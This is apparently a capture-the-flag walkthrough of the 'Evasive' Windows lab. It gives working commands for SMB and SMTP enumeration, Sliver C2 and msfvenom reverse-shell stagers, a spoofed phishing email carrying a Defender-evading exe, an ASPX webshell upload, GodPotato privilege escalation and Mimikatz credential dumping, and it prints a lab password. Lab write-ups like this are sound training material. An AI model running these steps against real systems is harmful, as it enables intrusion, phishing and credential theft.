Skip to content

Evasive

Overview

Target: Evasive
Platform: HackSmarter Labs
Difficulty: Medium
OS: Windows Server 2022

Attack path
  1. Enumerate SMB shares to find readable .pdf files
  2. Retrieve sensitive data (creds) & try them on services
  3. Create a malicious .exe program & attach it through a phishing mail
  4. Receive interactive shell and abuse write permissions on Webserver to RCE as another user
  5. Abuse Windows privilege to gain SYSTEM access.

1. Initial enumeration

Full TCP port scan:

nmap -p- 10.1.254.114 -T4 -oN evasive.nmap

Result:

Nmap scan report for 10.1.254.114
Host is up (0.096s latency).
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
587/tcp   open  submission
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
47001/tcp open  winrm

A mail stack (SMTP/POP3/IMAP), SMB, RDP and WinRM are exposed. Anonymous SMB access was denied initially:

nxc smb 10.1.254.114 -u '' -p '' --shares
# [-] Winserver01\: STATUS_ACCESS_DENIED

A Nuclei scan confirmed anonymous SMB read access was possible with a space/blank credential bypass:

nuclei -target 10.1.254.114 -dut
# [smb-anonymous-access] [javascript] [high] 10.1.254.114:445

2. SMB enumeration & Creds hunting

Using a space character as user:pass to bypass the restriction:

nxc smb 10.1.254.114 -u ' ' -p ' ' --shares
nxc smb 10.1.254.114 -u ' ' -p ' ' -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=10.1.254.114.shares MAX_FILE_SIZE=100000000

Files retrieved:

├── 10.1.254.114.json
└── 10.1.254.114
    └── docs
        ├── mail_doc.pdf
        └── old_user_setup_doc.pdf

Metadata extraction with exiftool revealed two usernames:

exiftool *.pdf
# Author: alfonso@winserver01.hs
# Author: roger@winserver01.hs

The old_user_setup_doc.pdf contained a default password in its content:

NewUser2024!

Build a users.txt with both usernames and try the password against SMB:

nxc smb 10.1.254.114 -u ./users.txt -p ./passwords.txt --shares --continue-on-success
# [-] Winserver01\alfonso:NewUser2024! STATUS_LOGON_FAILURE
# [-] Winserver01\roger:NewUser2024!   STATUS_LOGON_FAILURE

Didn't work. However, following the content of mail_doc.pdf, Alfonso is waiting a .exe program from Roger. So, we could try to connect on SMTP service to sendmail with roger@winserver01.hs to alfonso@winserver01.hs, using the default password discovered in the other .pdf.

To confirm our assumption, we can try an user enumeration on services:

SMTP confirmed both accounts (via RCPT; other methods are restricted):

smtp-user-enum -U ./users.txt -d winserver01.hs -m RCPT 10.1.254.114 25
# [SUCC] alfonso    250 OK
# [SUCC] roger      250 OK

RID brute-forcing via SMB also confirmed the user list:

nxc smb 10.1.60.87 -u ' ' -p ' ' --rid-brute
# 1000: WINSERVER01\alfonso (SidTypeUser)
# 1001: WINSERVER01\roger   (SidTypeUser)

3. Initial access

Sliver C2 Setup

Generate a stageless shellcode profile on the Sliver server:

profiles new --http 10.200.39.230:8999 --skip-symbols --format shellcode hs-evasive
http -L 10.200.39.230 -l 8999
stage-listener --url tcp://10.200.39.230:9999 --profile hs-evasive --prepend-size

I personally use a custom Go shellcode encypter (with SPECK algo) & loader, so i'm using msfvenom to generate a an initial Go payload:

msfvenom -p windows/x64/custom/reverse_tcp LHOST=10.200.39.230 LPORT=9999 -f go -o /tmp/stager.go -b '\x00\x0a\x0d'

At this point, you need to generate your .exe that will bypass Windows Defender detection using the method you want. Note that you could also generate the malicious .exe using sliver directly.

Sending the phishing email

The password found previously isn't the real one; but it gives us enough information to find the real one.

Hint

Think about companies & bad habits.

Hint 2

Starting from the password found, you're 1 letter away from the correct one 😄

sendEmail \
  -t 'alfonso@winserver01.hs' \
  -f 'roger@winserver01.hs' \
  -xu 'roger@winserver01.hs' \
  -xp 'fakepass!' \
  -s 10.1.60.87 \
  -u "EXE Program" \
  -m "Hello Alfonso,\nYou can find the EXE program on attached files.\n\nSincerely,\nRoger" \
  -a ./runner-indirect.exe \
  -v

Alfonso opened the attachment and the Sliver beacon connected back, giving an interactive shell as WINSERVER01\alfonso.

Documents found on the system:

C:\Users\alfonso\Documents\Database.kdbx
C:\Users\alfonso\Documents\merger-info.pdf

The merger-info.pdf revealed the company name, which was the first flag.

4. Lateral movement

Alfonso had write access to the IIS web root: 

icacls.exe c:\inetpub\wwwroot

Upload a classic ASPX webshell from the Sliver session:

cd C:\inetpub\wwwroot
upload /home/h0lm/Tools/revshells/cmd.aspx

Browse to http://10.1.60.87/cmd.aspx?cmd=whoami to confirm code execution via the web service account.

I personally relaunched the malicious .exe that was already on disk to create a new sliver session with this new identity.

5. Privilege escalation

On our new session, we had SeImpersonatePrivilege enabled. Use GodPotato (or similar Potato exploit) to escalate to NT AUTHORITY\SYSTEM:

execute-assembly /home/h0lm/Tools/windows/GodPotato-NET4.exe -- -cmd 'c:\inetpub\wwwroot\program2.exe'

This spawned a new Sliver session running as NT AUTHORITY\SYSTEM.

Persistence & Credential Dumping

Since we have SYSTEM Sliver session on the target, we can dump hashes via Mimikatz:

armory install mimikatz
mimikatz "privilege::debug" "token::elevate" "lsadump::sam" "exit"
mimikatz "privilege::debug" "token::elevate" "lsadump::secrets" "exit"

Using this command, we retrieve the Administrator's hash (2nd flag) & DefaultPassword of the workstation, we can now try using it to connect as alfonso on RDP service.

Connect via RDP:

xfreerdp /u:'alfonso' /p:'D2RE6xBc2pBO' /v:10.1.60.87 /cert:ignore /dynamic-resolution /kbd:layout:0x0000040c /scale-desktop:150 +clipboard

SMB connection was successful, and RDP session showed us the last flag cause Alfonso's KeePass was open !